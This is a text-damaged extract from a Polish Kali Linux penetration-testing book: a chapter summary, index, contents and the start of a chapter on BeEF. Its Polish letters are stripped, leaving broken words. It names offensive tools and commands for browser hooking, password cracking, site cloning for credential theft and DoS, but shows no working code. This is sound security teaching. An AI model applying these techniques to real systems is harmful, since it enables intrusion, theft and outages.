PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Spis tre ci
5
Rozdzia 4 Ataki na klienty aplikacji internetowych 147
In ynieria spo eczna 148Pakiet SET mdash Social Engineer Toolkit 149
Zastosowanie pakietu SET do ataku z klonowaniem 151MitM Proxy 161Skanowanie hostoacutew 162
Skanowanie hostoacutew za pomoc pakietu Nessus 162Przechwytywanie i amanie hase u ytkownikoacutew 169
Has a w systemie Windows 171Has a w systemie Linux 173
Narz dzia do amania hase dost pne w systemie Kali Linux 174Johnny 174Programy hashcat i oclHashcat 177samdump2 178chntpw 180Ophcrack 183Crunch 185
Inne narz dzia dost pne w systemie Kali Linux 188Hash-identifier 188dictstat 189RainbowCrack (rcracki_mt) 189findmyhash 190phrasendrescher 190CmosPwd 190creddump 191
Podsumowanie 191
Rozdzia 5 Ataki na metody uwierzytelniania 193
Ataki na zarz dzanie sesjami 195Clickjacking 196
Przechwytywanie ciasteczek sesji 197Narz dzia do przechwytywania sesji 198
Wtyczki przegl darki Firefox 198Cookie Cadger 203Wireshark 206Pakiety Hamster i Ferret 208Atak typu man-in-the-middle 211Narz dzia dsniff i arpspoof 212Ettercap 214Driftnet 217
Wstrzykiwanie kodu SQL 218sqlmap 221
Ataki typu XSS (cross-site scripting) 223Testowanie podatno ci na ataki XSS 224
Techniki XSS cookie stealing i Authentication hijacking 225
Kup książkę Poleć książkę
Spis tre ci
6
Inne narz dzia 227urlsnarf 227acccheck 228hexinject 228Patator 229DBPwAudit 229
Podsumowanie 229
Rozdzia 6 Ataki na aplikacje internetowe i serwery WWW 231
BeEF mdash Browser Exploitation Framework 232FoxyProxy mdash wtyczka przegl darki Firefox 236BURP Proxy 238OWASP-ZAP 245Przechwytywanie hase mdash pakiet SET 249Fimap 254Ataki typu DoS 255
THX-SSL-DOS 257Scapy 259Slowloris 261
LOIC czyli Niskoorbitalne Dzia o Jonowehellip 263Inne narz dzia 266
DNSChef 266SniffJoke 267Siege 268Inundator 269TCPReplay 270
Podsumowanie 270
Rozdzia 7 Przeciwdzia anie i zapobieganie 271
Testowanie mechanizmoacutew obronnych 273Podstawowe wymogi bezpiecze stwa 273STIG 274Zarz dzanie aktualizacjami i poprawkami zabezpiecze 275Polityka zarz dzania has ami 277
Klonowanie rodowiska 278HTTrack 279Inne narz dzia do klonowania witryn 281
Obrona przed atakami typu man-in-the-middle 281Obrona przed atakami SSLstrip 284
Obrona przed atakami typu DoS 285Obrona przed przechwytywaniem ciasteczek 286Obrona przed atakami typu Clickjacking 287Informatyka ledcza 287
Uruchamianie systemu Kali Linux w trybie Forensics 290Analiza systemu plikoacutew za pomoc narz dzi systemu Kali Linux 291Inne narz dzia ledcze w systemie Kali Linux 295
Podsumowanie 300
Kup książkę Poleć książkę
Spis tre ci
7
Rozdzia 8 Tworzenie raportoacutew ko cowych 301
Zgodno ze standardami i procedurami 303Us ugi profesjonalne 304Dokumentacja 306Format raportu 307
Strona tytu owa 307O wiadczenie o zachowaniu poufno ci 307Zarz dzanie wersjami dokumentacji 308Ramy czasowe projektu 308Streszczenie raportu 309Metodologia 310Szczegoacute owe procedury testowania 312Podsumowanie ustale 313Podatno ci i luki w zabezpieczeniach 315Wnioski i rekomendacje dla rodowiska sieciowego 316Dodatki 319Glosariusz 319
Wykaz prac 319Zewn trzne testy penetracyjne 321Dodatkowe elementy wykazu prac 323
Narz dzia wspomagaj ce tworzenie raportoacutew 325Dradis 325KeepNote 326Maltego CaseFile 326MagicTree 327CutyCapt 327
Podsumowanie 327
Skorowidz 329
Kup książkę Poleć książkę
Spis tre ci
8
Kup książkę Poleć książkę
6
Ataki na aplikacjeinternetowe
i serwery WWW
W tym rozdziale skoncentrujemy si na atakach przeprowadzanych z wykorzystaniem inter-netu Administratorzy odpowiedzialni za bezpiecze stwo rodowiska komputerowego firmyczy organizacji doskonale zdaj sobie spraw z tego e w internecie nie brakuje czarnych charak-teroacutew ktoacutere nieustannie szukaj nowych sposoboacutew prze amywania zabezpiecze W odpowiedzina takie zagro enia administratorzy staraj si implementowa coraz bardziej skomplikowanesystemy zabezpiecze Do najcz ciej spotykanych mechanizmoacutew obronnych nale zaporysieciowe systemy wykrywania w ama i zapobiegania im (IPSIDS mdash ang Intrusion PreventionSystemIntrusion Detection System) czy systemy instalowane bezpo rednio na hostach takiejak programy antywirusowe lub monitoruj ce wykorzystanie zasoboacutew W przesz o ci takie rozwi -zania by y w zupe no ci wystarczaj ce aczkolwiek spotykane obecnie z o liwe programy i innezagro enia ktoacutere czyhaj w sieci staj si coraz bardziej wyrafinowane i cz sto umo liwiajatwe obej cie mechanizmoacutew zabezpieczaj cych oferowanych przez standardowe komercyj-
ne produkty bdquoz poacute kirdquo (COTS mdash ang Commercial Off The Shelf) Narz dzia ktoacutere b dziemyomawiali w tym rozdziale pozwalaj pentesterowi na zdalne omijanie standardowych zabez-piecze atakowanych systemoacutew
Przedstawiane tu zagadnienia i oprogramowanie stanowi dope nienie arsena u technik i na-rz dzi ka dego pentestera aplikacji internetowych Z lektury poprzednich rozdzia oacutew dowie-dzia e si w jaki sposoacuteb przeprowadza rozpoznanie i gromadzi informacje o rodowiskub d cym celem testu penetracyjnego jak wyszukiwa podatno ci i luki w zabezpieczeniachzaroacutewno po stronie serweroacutew jak i klientoacutew aplikacji internetowych oraz pozna e sposobywykorzystywania znalezionych luk do uzyskania nieautoryzowanego dost pu do atakowanego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
232
systemu Teraz zajmiemy si technikami b d cymi niejako uwie czeniem ca ego procesu ata-kowania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Dodatko-wo poka emy w jaki sposoacuteb do ataku u y hellip serwera b d cego celem ataku oraz jak z amazabezpieczenia aplikacji internetowych w ramach atakoacutew na przegl darki atakoacutew z wykorzy-staniem serweroacutew proxy oraz przechwytywania hase dost pu Omoacutewimy roacutewnie wybranemetody zak oacutecania pracy us ug internetowych za pomoc atakoacutew typu DoS
BeEF mdash Browser Exploitation Framework
Podatno ci i luki w zabezpieczeniach przegl darek mog by wykorzystywane przez z o liweoprogramowanie do zmiany zachowania przegl darki w okre lonych sytuacjach Podatno ciprzegl darek internetowych to bardzo popularny wektor ataku poniewa zdecydowana wi k-szo systemoacutew operacyjnych pod ktoacuterych kontrol dzia aj klienty aplikacji internetowychwyposa ona jest w tak czy inn przegl dark Przyjrzyjmy si zatem jednemu z najpopular-niejszych narz dzi przeznaczonych do wykorzystywania luk w zabezpieczeniach przegl darekinternetowych
Istnieje wiele interesuj cych narz dzi wspomagaj cych przeprowadzanie testoacutew penetracyjnychNarz dzia te powinny si znale w Twoim bdquohakerskimrdquo arsenale Jednym z nich z pewno ci jestprogram BeEF (ang Browser Exploitation Framework) BeEF to pakiet zbudowany w oparciuo przegl dark ktoacutery bdquopodpina si rdquo do jednej przegl darki lub nawet kilku przegl darek w syste-mie klienta i tworzy przyczoacute ek ktoacutery mo na wykorzysta jako baz do dalszych atakoacutew U yt-kownik mo e zosta bdquozaatakowanyrdquo kiedy odwiedza specjalnie przygotowan stron internetow po czym kontynuuje przegl danie innych witryn nie zdaj c sobie zupe nie sprawy z tego enapastnik ma ju pe ny dost p do jego sesji BeEF potrafi omin zaroacutewno sieciowe urz dze-nia zabezpieczaj ce jak i mechanizmy ochronne instalowane bezpo rednio na hostach takiejak systemy antywirusowe Staje si to mo liwe dzi ki wykorzystywaniu luk w zabezpieczeniachpowszechnie spotykanych przegl darek takich jak Internet Explorer czy Firefox
Pakiet BeEF nie jest do czany do wersji 10 systemu Kali Linux ale mo esz pobra go zestrony httpbeefprojectcom Mamy jednak nadziej e ze wzgl du na swoj du popularnow rodowisku pentesteroacutew i nie tylko BeEF znajdzie si w kolejnych wydaniach systemu KaliLinux
Aby zainstalowa pakiet BeEF powiniene otworzy okno terminala i z poziomu u ytkownikaroot wykona nast puj ce polecenia
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
233
